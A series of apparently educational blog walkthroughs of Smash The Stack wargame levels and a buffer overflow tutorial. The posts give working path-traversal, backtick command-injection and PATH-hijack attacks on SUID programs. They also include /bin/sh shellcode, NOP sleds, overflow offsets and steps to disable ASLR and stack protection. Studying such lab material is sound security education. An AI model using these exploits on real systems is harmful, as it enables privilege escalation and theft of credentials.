Blackbox Level 4 – Sanitization Side Effects

Welcome back for another level of Blackbox from Smash The Stack.  Today we will be looking at level 4.  As always, the final password will be stripped from the page and replaced with Y’s.  If you are following along in terminal, go ahead and ssh in and let’s begin.

As usual with Blackbox, the current level’s files are in the home directory so we can check them out via ls.

level4@blackbox:~$ ls -la
total 1192
drwxr-x— 2 level4 level4 4096 Jul 9 2009 .
drwxr-xr-x 17 root root 4096 Mar 22 15:30 ..
lrwxrwxrwx 1 root root 9 Jun 17 2009 .bash_history -> /dev/null
-rw-r–r– 1 root level4 567 Dec 29 2007 .bash_profile
-rw-r–r– 1 root level4 1834 Dec 29 2007 .bashrc
-rw-r–r– 1 root level5 10 Dec 29 2007 password
-rwsr-xr-x 1 level5 level5 1189214 Jan 12 2008 shared
-rw-r–r– 1 root root 1505 Dec 29 2007 shared.cc

We see two files, the SUID executable “shared” and the provided source, “shared.cc”.  To try and understand the program, let’s go ahead and execute it:

level4@blackbox:~$ ./shared
This program allows you to read files from my shared files. See /usr/share/level5 for my shared files. Simply use the path relative to my shared files to read a file!
Example: ./shared lyrics/foreverautumn

Judging by the output, we have an idea of what the program should be doing.  In general, it will display to us the contents of a file.  However, it has to be a file located at the directory /usr/share/level5 or deeper.  Let’s check out the directory:

level4@blackbox:~$ ls /usr/share/level5
lyrics shit1 shit2 shit3 shit4 shit5
level4@blackbox:~$ ls /usr/share/level5/lyrics
foreverautumn
level4@blackbox:~$ more /usr/share/level5/shit1
shit
level4@blackbox:~$ more /usr/share/level5/lyrics/foreverautumn

LOL, I can’t find the lyrics, so google.com

Now at this point we have an idea of the directory structure and of the files.  From here, if we can move up directories using the “..” dir listing, we could potentially re-route the program to read from /home/level5/password.  Let’s see if we have full control over the relative path supplied.  When doing this, remember to try and get to a file the program would have permissions to view.

level4@blackbox:~$ ./shared lyrics/../shit1
Contents of /usr/share/level5/lyricsshit1:
Unable to open file
level4@blackbox:~$ ./shared ../level5/shit1
Contents of /usr/share/level5/level5/shit1:
Unable to open file

Well this is interesting.  From the error message, it looks like the program may be stripping “/../” out of the string we provided.  Additionally, it’s either stripping or skipping the “../” at the beginning of the string.  From here, let’s take a look at the source code file provided to see what is happening.  I’ll leave it to you to view and understand the entire file as it’s a little large to post here.  However, let’s talk about a few key points.

We see the file takes one command line argument as a string for a local path.  From here it takes the string and strips any leading / or . characters.   It next uses the strreplace function (locally defined) to strip all instances of /../ from the string.  It’s important to note this function makes one forward pass.  Afterwards, the strreplace function is used again to remove /./ from the string.  Finally, this “sanitized” string is appended to the end of the string “/usr/share/level5/” to make the string for the full path which the program will then open and write all lines of to the screen.

We will attempt to exploit the way the program sanitizes user input to create a string which points to /home/level5/password.  To do this, let’s look at how strreplace works and how it’s used in the program.  Strreplace removes instances of a string from another string and replaces it with a third string.  In this program, /../ is replaced with nothing; it is simply removed.  When doing this, strreplace keeps moving forward every time it replaces part of the original string.  Because of this, if one /../ is removed which causes another to be created in it’s place, strreplace will not see the newly created one.  Additionally, the program only calls strreplace on /../ once, not until it’s no longer there (and also not after the removal of /./ which could also have the side effect of creating /../).  So, what would one of these strings look like?  Well, like we just said, we will have /../, and when it’s removed, a new /../ needs to be created.  So assuming /../ is in the middle, let’s wrap the other around, giving us “/./.././”.  Let’s see if this works in the program (the source shows it should):

level4@blackbox:~$ ./shared lyrics/./.././shit1
Contents of /usr/share/level5/lyrics/../shit1:
shit

Aha!  We’ve done it, we’ve successfully moved up a directory.  Now let’s just reapply this idea to get to the level5 password:

level4@blackbox:~$ ./shared lyrics/./../././../././../././.././home/level5/password
Contents of /usr/share/level5/lyrics/../../../../home/level5/password:
YYYYYYYYY

There we have it, the end of level 4.  I can’t stress it enough, when a change is made to a value, the value needs to be re-verified as valid.  Simply removing a character or character string from something doesn’t make it safe.  Especially not when you only check for a character set once, and allow character removal to create the exact sets you were trying to prevent.  Test to verify and verify at the end.

Posted in BlackBox, Smash The Stack, Wargames | Tagged , , , , | Leave a comment

Blackbox Level 3 – Step Back

Today we’re going to be looking at level 3 of the Smash The Stack wargame, Blackbox.  As usual, the password will be stripped from the page and replaced with Y’s.  Now let’s move onto the game by ssh’ing into the server as level 3.

Upon arrival the first thing we should do is look for our vulnerability and any source code, if available.  A quick ls of the home directory rewards us with a level4 SUID program called proclist, as well as a readable file called proclist.cc.  Examining further we can see that proclist.cc is (most likely) the source file:

level3@blackbox:~$ more proclist.cc
#include <iostream>
#include <string>

int main(int main, char **argv)
{
std::string command;
std::string program;

std::cout << “Enter the name of the program: “;
std::cin >> program;

for(unsigned int i = 0; i < program.length(); i++) {
if(strchr(“;^&|><“, program[i]) != NULL) {
std::cout << “Fatal error” << std::endl;
return 1;
}
}

// Execute the command to list the programs
command = “/bin/ps |grep “;
command += program;
system(command.c_str());

return 0;
}

It is always important to understand a file when looking for a vulnerability, and today provides no exception.  Analyzing the code we can see that the program does a few things.  First, it gets input from the user using cin’s >> operator and puts it into the variable “program”.  Next, it searches through the user input stored in “program”, making sure it doesn’t consist of any of the characters ; ^ & | > or <  If one of the characters is found in the input string, the program exits.  Afterwards, the program appends the input string in “program” to the end of the command string with value “/bin/ps |grep “.  Finally the entire command string is sent to a system call via a non-mutable C string provided by the c_str() function.

Thinking about the flow of the program, it seems like the system call might be where we want to make our attack.  After all, user input in put into the system call.  So, if we can use maliciously formed input, maybe we can control what they system call does.  To do this, we must note a few things.  One is that the program uses cin >> and therefore we cannot include any white-space in our input string.  Second, in Linux we can separate shell or system call commands via a semi-colon.  Third, in Linux shell there are three quotes one can use, single quote, double quote and backtick.  Single quotes don’t resolve variables and only additional single quotes need to be escaped.  Double quotes allow for resolving variables to their values.  Lastly, backticks execute the command string inside of them.

First, let’s look at point two.  We could potentially cause multiple command execution (such as /bin/sh) if we could include a semi-colon in our user input string.  If the system call ran as system(“/bin/ps |grep ;/bin/sh”) we would get a shell.  Unfortunately, as we noted when reading through the program, semi-colons are one of the terminating characters for the program.  Thus, we must look for a different approach as this program is attempting to validate user input, good!

-Backtick Attack:

While the user input sanitization checks for a few characters, it doesn’t check for the backtick.  Observing this and knowing that the backtick causes execution of the command string within, we may be able to cause the program to run a command.  However, looking back at point one, our backtick’ed string cannot contain any spaces.  Thus, we will have to write a little shell script to do what we want.  In this case, we want to have the program get the contents of the password file for the next level and save it into a file we can read.  This is due to the fact that we won’t be able to access a shell directly (even by executing /bin/sh) since the execution is only being used as a parameter to grep and will close immediately.  However, an executed shell script can write to a file and quit.  Let’s look at the shell file we’re going to use:

level3@blackbox:/tmp/.t$ more catpass
#!/bin/sh
/bin/cat /home/level4/password > /tmp/.t/p

As stated before, the shell script runs cat on the password file for the next level and saves it to a file of our choosing.  Now let’s set up our files, don’t forget to set the correct privileges:

level3@blackbox:/tmp/.t$ chmod 755 catpass
level3@blackbox:/tmp/.t$ touch p
level3@blackbox:/tmp/.t$ chmod 777 p

Now we’re ready to run the program and provide it with our malicious string.

level3@blackbox:/tmp/.t$ /home/level3/proclist
Enter the name of the program: `./catpass`
Usage: grep [OPTION]… PATTERN [FILE]…
Try `grep –help’ for more information.
level3@blackbox:/tmp/.t$ more p
YYYYYYYYY

There we have it, that is one way to do Blackbox Level 3.  Remember the backticks cause the contents to be executed.  Here we saw the system call ran ps and piped it’s results to grep.  grep then executed with a variable and that variable was executed (because of the backticks), causing the password to be ripped.  Finally grep finished, leading to the program’s exit.  Moral of the story is to provide better user input validation and sanitization.  Additionally, it’s usually a bad idea to directly make a system call on data which is under the control of users.

 

-Path Attack:

In most, if not all, modern day operating systems there exists something called the path.  The path is a list of directories in which the operating system will look for programs with the same name of programs run by the user (when the user doesn’t provide a full path to the file).  In the program which we are exploiting today, there exists a vulnerability based on this PATH variable.

In our program when the system call is executed, two commands are run by default.  The first is /bin/ps.  This command is provided as a full path and thus cannot be easily re-directed.  The second command however, is simply grep.  Since a full, or relative, path wasn’t provided for the file, the system will look in the PATH environmental variable for directories to look for a file with the same name.  If we can re-write the PATH and we can cause the system call to execute a program called grep, but in the directory of our choosing.  Using this we can put our password-acquiring shell script in our chosen directory with the name grep, and watch it be executed.  Let’s go a head and setup our files, similar to the backtick attack above:

level3@blackbox:/tmp/.t$ more grep
#!/bin/sh
/bin/cat /home/level4/password > /tmp/.t/p
level3@blackbox:/tmp/.t$ chmod 755 grep
level3@blackbox:/tmp/.t$ touch p
level3@blackbox:/tmp/.t$ chmod 777 p

Now let’s re-write the PATH to be set to the current directory, where our fake grep program is:

level3@blackbox:/tmp/.t$ export PATH=./

Finally we can run the program and see what happens:

level3@blackbox:/tmp/.t$ /home/level3/proclist
Enter the name of the program: a
level3@blackbox:/tmp/.t$ /bin/cat p
YYYYYYYYY

There we have it again, Blackbox Level 3 through PATH exploitation.  Remember if you don’t provide a full file name, the operating system will look for it in your PATH, something under the control of the user.

Posted in BlackBox, Smash The Stack, Wargames | Tagged , , , , , | Leave a comment

Blowfish Level4 – Simplest of simple buffer overflows

Welcome back for another installment from our Blowfish wargaming series, here at Technolution.  Of course, Blowfish is brought to you by the wonderful folks over at Smash The Stack.  Today we will be looking at level4.  Everyone should have the level4 pass from the previous level and should be able to ssh into the server.  Go a head and ssh in, and let’s get started.

Once there we should remember that on Blowfish, the binaries we’ll be exploiting are in the /levels directory.  Upon getting a listing of that directory we see two useful files, level4.c and the level4 SUID binary.  Lets read the source file to see what we’re working with:

level4@blowfish:/levels$ more level4.c
#include <stdio.h>

int main(int argc, char * argv[]) {

char buf[256];

if(argc == 1) {
printf(“Usage: %s input\n”, argv[0]);
exit(0);
}

strcpy(buf,argv[1]);
printf(“%s”, buf);

}

Interesting.  From looking at the source file we see unsafe use of strcpy.  From this implementation, we can overflow buf if we can control argv[1].  Lucky argv[1] is the first command line argument passed to the program, which is something we can easily control!  Looking at the size of buf we know we’ll need at least 256 bytes.  So let’s attempt a few runs of the program in gdb to see how many bytes we need to fill before we can overwrite the return address of the stack!

level4@blowfish:/levels$ gdb level4
(gdb) run `perl -e ‘print “A”x280,”BBBB”‘`
Starting program: /levels/level4 `perl -e ‘print “A”x280,”BBBB”‘`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

(gdb) run `perl -e ‘print “A”x275,”BBBB”‘`

The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level4 `perl -e ‘print “A”x275,”BBBB”‘`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `perl -e ‘print “A”x270,”BBBB”‘`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level4 `perl -e ‘print “A”x270,”BBBB”‘`

Program received signal SIGSEGV, Segmentation fault.
0x42424141 in ?? ()
(gdb) run `perl -e ‘print “A”x268,”BBBB”‘`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level4 `perl -e ‘print “A”x268,”BBBB”‘`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

There we have it, 268 bytes until we’re positioned to overwrite the return address and take control of the flow of execution.  Next we need to place shellcode in memory.  We’ll be placing our shellcode in an environmental variable called SHELLCODE.  Let’s look at the command to do this:

level4@blowfish:/levels$ export SHELLCODE=$’\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e
\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69
\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80′

Now that our shellcode is in memory, we need to get it’s starting memory address.  We will use a C program that takes an environmental variable as an argument and returns it’s starting memory location.  This program is as follows:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
if(!argv[1])
exit(1);
printf(“%#x\n”, getenv(argv[1]));
return 0;
}

Let’s compile and use the above program:

level4@blowfish:/levels$ mkdir /tmp/.somedir
level4@blowfish:/levels$ vi /tmp/.somedir/getmem.c
level4@blowfish:/levels$ gcc /tmp/.somedir/getmem.c -o /tmp/.somedir/getmem
level4@blowfish:/levels$ /tmp/.somedir/getmem SHELLCODE
0xbfffd9eb

Now that we have our starting memory location of our shellcode, we can combine it with our buffer overflow to re-route program execution:

level4@blowfish:/levels$ /levels/level4 `perl -e ‘print “A”x268,”\xef\xd9\xff\xbf”‘`
sh-3.2$ whoami
level5

Bam!  Level 4 is complete.  Again, a simple buffer overflow.  Now a days, we have to specifically compile programs to be vulnerable to this type of attack.  However, the safety mechanism implemented don’t prevent buffer overflows, they simply try to catch and respond to overflows without losing control, or allowing arbitrary code execution.  In future levels we may run into some of the prevention mechanisms, but for now, that’s all folks!

Posted in Blowfish, Smash The Stack, Wargames | Tagged , , , | Leave a comment

Blackbox Level2 – Simple Overflow

Welcome back to Technolution.  Today’s blog will be about the SmashTheStack wargame, Blackbox.  We will be looking at level 2 of the wargame and as such I will assume you have the correct login credentials.  Now let’s begin by ssh’ing into blackbox as level2.

Upon arrival a quick ls -la shows a SUID level3/level2 program called getowner as well as what we will assume is it’s source, getowner.c.  Let’s examine getowner.c:

level2@blackbox:~$ more getowner.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
char *filename;
char buf[128];

if((filename = getenv(“filename”)) == NULL) {
printf(“No filename configured!\n”);
return 1;
}

while(*filename == ‘/’)
filename++;
strcpy(buf, “/tmp/”);
strcpy(&buf[strlen(buf)], filename);

struct stat stbuf;
stat(buf, &stbuf);
printf(“The owner of this file is: %d\n”, stbuf.st_uid);

return 0;
}

Before we can exploit a vulnerability we must first find one, and the first step towards finding a vulnerability is to understand what the program is doing.  Looking at the source we see that there are two variables used in the program, a character pointer called filename and a character array of size 128 called buf.  After variable declaration the program gets the address of the start of an environmental variable called “filename” and assigns it to our char pointer, filename.  If no environmental variable called filename exists, the program prints “No filename configured” and exits.  At this point, we can see that we may have a way to insert code into the program by controlling the environmental variable “filename”, however we need to see what the program does with the string to see how it might be of use.  After loading the filename variable the next step of the program tests the contents of the string pointed to by filename.  If the string starts with the character “/”, filename is advanced by one.  This effectively strips any leading “/” characters from the filename string.

Next, we see the use of strcpy.  As used, strcpy copies the string provided as the 2nd parameter to continuous memory starting at the location provided by the first parameter.  It will continue to copy memory until a NULL character is reached (hex 0x00).  Thus we see the memory for our char array buf, get’s the string “/tmp/” written to it, then the contents of the memory starting at the location pointed to by filename written starting after the “/tmp/”.

After strcpy, a structure is assigned for file stats, using the full file name now in buf.  Finally, printf writes to the screen the owner of the file with location stored in buf (/tmp/stringPointedToByfilename), and the program exits.

Now that we understand the program, we can analyze how it might be vulnerable to exploitation.  Understanding the call stack is important for what we are looking at here today with buffer overflows.  Hopefully we are familiar with the idea of the call stack, and that when functions are called on a computer, they need memory to be allocated for their variables, and a couple other things.  This isn’t a stack tutorial so we won’t go into general details, but let’s look at today’s example.  In our getowner program, when main is executed, we will see the following layout on the call stack:

[filename][buf][argc/argv][sfp]   [ra]

[CCCC][BB…BB][DD…DD][XXXX][ZZZZ]

[4bytes][128bytes][4bytes+9bytes][4bytes][4bytes]

This memory structure, combined with strcpy into buf, means that if we supply a string to strcpy that is longer than buf, strcpy will end up overwriting the memory for argc/argv, the saved frame pointer, and eventually the return address.  This is a major security problem in that if the return address is overwritten with a value representing a valid memory location, any code at that location will be executed.  It’s also a quality assurance problem in that if the return address doesn’t have a valid location in it, it will cause a program crash.

Now we know we can and want to overflow buf, so let’s think backwards.  How does buf get it’s data?  From filename.  Where does filename get it’s value?  From the environmental variable called “filename”.  So let’s create an environmental variable with the name filename and a value of a string of A’s using perl and the export command.  Let’s also test the getowner program after doing so to make sure it reads the env var:

level2@blackbox:~$ export filename=`perl -e ‘print “A”x160’`
level2@blackbox:~$ ./getowner
The owner of this file is: 0
Segmentation fault

There we go.  Segmentation fault is indicating we’re most likely overwritten the return address and the program is trying to execute code at a memory address without valid executable code.  The next thing we want to do is determine how many A’s we need to stuff in filename so that we can carefully overwrite the return address.  We can examine the RA using gdb.  Let’s give it a test run:

level2@blackbox:~$ gdb getowner
GNU gdb 6.4.90-debian

(gdb) run
Starting program: /home/level2/getowner
The owner of this file is: 0

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

The 0x41414141 at the end is our indicator that the return address, and eventually EIP, got overwritten with A’s (41 is the hex code value for ascii A).  From here we will do a quick test with the filename string length to determine how many bytes are needed til we overwrite the RA.  One could also continue using gdb to determine where the RA is and how many bytes are between the buffer and RA, but we’ll go with the less technical route today for ease of readability (and since this isn’t a gdb tutorial).

Now that we know 160 A’s overwrites the return address, let’s try with 150, and add the 32 bit string “BBBB” to the end.  This is to help determine the correct number of bytes before the return address.  Let’s try again:

level2@blackbox:~$ export filename=`perl -e ‘print “A”x150,”BBBB”‘`
level2@blackbox:~$ gdb getowner
GNU gdb 6.4.90-debian

(gdb) run
Starting program: /home/level2/getowner
The owner of this file is: 0

Program received signal SIGSEGV, Segmentation fault.
0x00424242 in ?? ()

Excellent!  We can see with 154 total bytes, we are one byte short of completely filling up the return address.  Thus, adding one more A to our string (151 in total) will correctly position the 32 bit string “BBBB” to overwrite the return address.  Now if we replace “BBBB” with 4 hex bytes that correspond to an actual memory address, we’ll be ready to make the program go execute the code we desire.  First however, we must decide on the code we want to execute.  Then we can place it into memory, and finally, get it’s memory address.

To write code which will execute, we must write it in low-level op-code.  Op-code is Operating System and hardware architecture dependent.  We will refer to our op-code today as shellcode since we will be using code which spawns a shell [executes /bin/sh with the linux command execve(/bin/sh)].  Since today’s article is not about writing shellcode we will simply use the following 42 byte shellcode which we obtained online from Packet Storm:

“\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8”
“\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68”
“\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31”
“\xd2\xb0\x0b\xcd\x80”

The easiest way to place the above code into memory would be to place it in an environmental variable.  While we could use the filename environmental variable, we can also make a new one.  So to keep things simple, let’s assign our shellcode to the environmental variable SHELLCODE:

level2@blackbox:~$ export SHELLCODE=$’\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31
\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3
\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80′

One thing to note about the above shellcode is that we added the hex value \x90 to the beginning a few times.  \x90 is the op-code instruction for No-Operation (or NOP).  No-op’s don’t perform any operation during the CPU cycle and simply forward to the next instruction.  This no-op padding is used so if our program switches execution to the memory location of any if the NOPs, we will be fast forwarded to our shellcode.

Now that our shellcode is loaded into memory, we need to find out where it memory it resides.  To do this we will use a quick C program that takes as input one string, the name of an environmental variable.  The program then returns the address in memory where the environmental variable is stored.  Let’s look at the program:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
if(!argv[1])
exit(1);
printf(“%#x\n”, getenv(argv[1]));
return 0;
}

Now let’s compile our program and use it to find the memory location of the environmental variable SHELLCODE:

level2@blackbox:/tmp/.somedir$ gcc getmem.c -o getmem
level2@blackbox:/tmp/.somedir$ ./getmem SHELLCODE
0xbfffdb78

Alright!  Now we know our shellcode begins at memory location 0xbfffdb78.  Next we should replace our “BBBB” string from filename from the environmental variable with a memory value in the middle of our NOP-sled, and our exploit should be complete!  One last thing to remember is that we need to write the memory address in little-endian format, which means reverse byte format.  Let’s rewrite out filename environmental variable:

level2@blackbox:/tmp/.somedir$ export filename=`perl -e ‘print “A”x151,”\x7f\xdb\xff\xbf”‘`

Now let’s see what happens when we run the vulnerable getowner program:

level2@blackbox:~$ ./getowner
The owner of this file is: 0
sh-3.1$ whoami
level3

There we have it, shell as level3.  Don’t forget to check out /home/level3/password for the level3 password.  Level2 has been an intro to buffer overflows.  While buffer overflow attacks have been common for a long time, compilers and operating systems are working on ways to combat them.  However, most of the protective measures can also be circumvented by a crafty attacker.  Due to the nature of buffer overflows, this type of vulnerability is expected to stay around for a long time.

Posted in BlackBox, Smash The Stack, Wargames | Tagged , , , | Leave a comment

Classic Attacks – Buffer Overflow

Welcome back to Technolution.  In today’s post we’re going to be looking at a classic computer security vulnerability, the buffer overflow.  This type of vulnerability can surface in many kinds of programs and has been the vector of exploitation for many real world attacks.  Today, we will attempt to go into a medium level of detail (leaving out an in depth assembly analysis) on buffer overflows, including what causes them, how they can be exploited, and various preventative measures.  Now, let’s get started.

First off, what is a buffer overflow?  A buffer overflow is when a program attempts to place more data into a buffer than the buffer has room for.  How does this manifest?  Well, let’s pretend we have a char array in a C program to act as a buffer for user input.  This could easily happen if the user enters more characters than the length of the program.  In this case, if there wasn’t input validation, the program would have to make the decision on what to do.  However, a computer can’t “make decisions,” all it can do is what it was programmed to do.  For a concrete example, lets look at string copy:

char buffer[7];
char data[] = “somedata”;
strcpy(buffer, data);

In the above C code, the strcpy function will write all the bytes starting from the memory location pointed to by data, until the first null character (which marks the end of the string), to the memory beginning at the location pointed to by buffer.  Since buffer was declared to be 7 bytes long, the 8th byte from data will overwrite something other than the buffer array.  This can end up causing adverse program execution.

To understand how to exploit this, we must understand how memory is used.  When a function is run, memory must be allocated.  The amount of memory allocated depends on the demands of the function.  However, additional memory is allocated for a couple pointers.  One pointer is for the saved stack frame and one is for the return address. Ultimately, the return address is where the program returns execution to after the current function finishes.  Thus, for exploitation, if we can change the return address, we can change what code will be executed next and this is exactly the point of buffer overflows.

Taking the 7 byte buffer above, our memory looks something like this:

    buffer         sfp       ra

[BBBBBBB][xxxx][xxxx]

Each B in the buffer is a byte representing a character, each x in sfp and ra are hex bytes for memory addresses.  Now lets look at strcpy with a different value:

#include <stdio.h>
#include <string.h>

int main()
{
char buffer[7];
char data[] = “aaaaaaaaaaaaaaabbbbcccc”;
strcpy(buffer, data);
}

Running the program we get a segmentation fault!  If we load up gdb we can see the program ends with a strange value in eip (the value loaded from the overwritten return address of the stack frame).

(gdb) run
Starting program: /tmp/.somedir/tst

Program received signal SIGSEGV, Segmentation fault.
0x63636363 in ?? ()
(gdb) info registers
eax 0xbfffdce9 -1073750807
ecx 0x0 0
edx 0x18 24
ebx 0xb76ff4 12021748
esp 0xbfffdd00 0xbfffdd00
ebp 0x62626262 0x62626262
esi 0x0 0
edi 0x0 0
eip 0x63636363 0x63636363
eflags 0x210246 [ PF ZF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

What is does this mean?  What is 0x63?  Well if we load up an ascii chart, we can see hex value 0x63 is the ascii value “c”.  Excellent, we filled eip with “cccc,” just what we were trying to do!  We can also see that esp (the stack pointer) was over written with 0x62, the value for “b”.  Thus, we can assume we had the correct number of a’s over flowing the buffer and filling up a little extra space in memory for things we aren’t quite talking about (Ok, it’s for function parameters. If you remember correctly main always has two, argv[] and argc, mine just happens to take 4 bytes for the argc (32 bit int) and 4 bytes for the name “tstNULL” since strings are null-terminated, so 8 extra a’s).  All we have to do now is find the memory location of any arbitrary code we want to execute, and replace the “cccc” with four hex values representing the memory location of our code.  Upon completion, we will execute the program again and watch the ‘flow!

While we could potentially search through memory looking for useful code to execute, it would be more useful if we could supply the code we want to execute.  However, in many cases this is possible.  Though this code, referred to as shellcode, has a few need to knows.  First, shellcode is opcode.  For those unfamiliar with opcode, it is the actual values (frequently read in hex) which are passed through the physical parts of the computer.  Due to the low level nature of opcode, it is OPERATING SYSTEM and ARCHITECTURE dependent.  This means we need different opcode for each OS and for different hardware architectures.  Additionally, it’s important to remember that  shell code shouldn’t contain any NULL characters (0x00).  The process of deriving shellcode is slightly involved and not the point of today’s article.  Luckily, there are many sources out there to find good shellcode.  Today we will use some Linux shellcode we found online which will run execve(/bin/sh), providing us with a new shell spawned by the program.  The shellcode is as follows:

“\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8”
“\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68”
“\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31”
“\xd2\xb0\x0b\xcd\x80”

Now that we have the code we want to execute, we need to somehow place it into memory.  There are multiple ways to do this given the situation.  One way is to place the shllecode into an environmental variable.  Another might be to place the shellcode in any variable which the program reads from the user or a file.  Today we’ll stick with environmental variables as they are the most straight forward.  In Linux, the command for setting an environmental variable is “export”.  Lets see how to set a variable, SHELLCODE, with our actual shellcode:

user@localhost:~$ export SHELLCODE=$’\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8
\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f
\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80′

We now have an environmental variable called SHELLCODE with the opcode we want to execute.  One thing to notice about the shellcode is the set of \x90 at the beginning.  0x90 is the op-code for no operation (“NOP”).  NOPs don’t cause anything to happen, they just go on to the next operation.  These NOPs are used for padding, so that if we jump to the memory location of any of them, they will just fast-forward to our actual execve(/bin/sh) code.  Now the next thing we need to do is find the memory address of the SHELLCODE variable.  To do this we will use a C program, such as the following:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
if(!argv[1])
exit(1);
printf(“%#x\n”, getenv(argv[1]));
return 0;
}

Upon execution, the above program will give us the memory address of the environmental variable we supplied as the first argument.  Thus, we should run it with the argument SHELLCODE.  Let’s try:

user@localhost:/tmp/.somedir$ ./getmem SHELLCODE
0xbfffde83

Excellent!  We have now inserted our shellcode into memory beginning at address 0xbfffde83 via an environmental variable.  Our final step is to go run our vulnerable program and cause a buffer overflow to overwrite EIP with the value 0xbfffde83.  But before we do, we need to talk about memory formats.  There are two memory formats as we’re talking of today, little-endian and big-endian.  The difference between the two is basically which bit is defined as the highest order bit and which is the lowest.  To keep this post short, we need to write our memory address as little-endian, which means we need to write it in reverse (byte) order.  Let’s re-examine our vulnerable program, and overflow string:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
char buffer[7];
char data[] = “aaaaaaaaaaaaaaabbbbcccc”;
strcpy(buffer, data);
}

To change the overflow string to point to our desired memory address (0xbfffde83), we will write it as the following:

char data[] = “aaaaaaaaaaaaaaabbbb\x83\xde\xff\xbf”;

Thus, our final program with hard-coded memory address pointing to the environmental variable with our shellcode is as follows:

#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer[7];
char data[] = “aaaaaaaaaaaaaaabbbb\x83\xde\xff\xbf”;
strcpy(buffer, data);
}

Finally, we’ll compile and test our program.  If everything goes correctly, it should spawn a shell.  One final note is that a lot has changed since the original days of buffer overflows.  As such, many compilers automatically include buffer overflow precautions in the programs they compile.  As a result, we will have to compile our program with a couple special options to make it vulnerable to the simple attack we’re using today.  First, we have to turn off stack guard and stack shield.  Second, we have to allow the stack to be executable, since we’re storing our shellcode there.  Let’s compile and test:

user@localhost:/tmp/.somedir$ gcc -fno-stack-protector -z execstack test.c -o tst
user@localhost:/tmp/.somedir$ ./tst
sh-4.1$

There you have it, a successfully exploited buffer overflow.  If it doesn’t work, one final thing to check would be stack randomization.  “cat /proc/sys/kernel/randomize_va_space” should show 0.  If it returns 1, simply “echo 0 > /proc/sys/kernel/randomize_va_space” to turn it off.

Buffer overflows are one of the older attack vectors when it comes to exploitation and as such, many compilers and operating systems have developed ways to try and prevent these attacks.  However, buffer overflows are still found heavily out in the wild and many of the preventative measures have themselves been circumvented.  In the future we will examine some wargames which focus on various buffer overflows, preventative measures, and ways to combat them.

Posted in Uncategorized | Tagged , , | Leave a comment